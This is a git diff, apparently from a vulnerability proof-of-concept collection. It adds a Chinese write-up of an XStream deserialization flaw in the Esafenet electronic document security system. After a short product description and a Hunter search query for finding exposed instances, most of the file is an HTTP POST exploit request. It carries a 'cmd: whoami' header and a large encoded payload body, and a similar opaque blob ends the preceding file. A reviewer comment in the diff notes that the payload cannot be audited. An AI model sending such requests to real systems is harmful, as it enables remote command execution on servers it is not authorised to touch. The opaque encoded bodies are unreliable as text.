OEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKO
JLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1704465383622-c8f765bb-0518-4755-814e-b6c6e33b4141.png](./img/8zi-BeBfAYPgtdrb/1704465383622-c8f765bb-0518-4755-814e-b6c6e33b4141-354783.png) + + + +> 更新: 2024-04-20 22:01:34 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lv0vpgq01k5gln5t> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统ExamCDGDocService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统ExamCDGDocService1存在xstream反序列化漏洞.md new file mode 100644 index 0000000..cdc5a90 --- /dev/null 
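Review bot: the fenced request body closed by the `+```` at the end of this hunk is one opaque encoded blob with no note of its encoding or of what it expands to, so a reader cannot audit what the PoC actually sends; add a sentence above the fence describing the payload's format and how it was produced. The file is also committed without a trailing newline (`\ No newline at end of file`); add one.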
+++ b/亿赛通电子文档安全管理系统ExamCDGDocService1存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统ExamCDGDocService1存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统ExamCDGDocService1存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/dO2u_IB_Mn-UFxxN/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-304979.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/ExamCDGDocService1 HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNG
MDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPOD
PLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMK
IBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJ
ANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJ
BDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBO
JNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPK